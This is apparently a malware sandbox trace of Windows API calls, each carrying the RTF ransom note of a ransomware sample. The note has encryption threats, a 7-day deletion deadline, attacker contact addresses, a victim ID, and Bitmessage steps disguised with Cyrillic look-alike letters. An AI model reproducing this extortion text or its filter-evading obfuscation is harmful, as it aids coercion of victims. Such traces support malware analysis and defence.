\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ed55a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 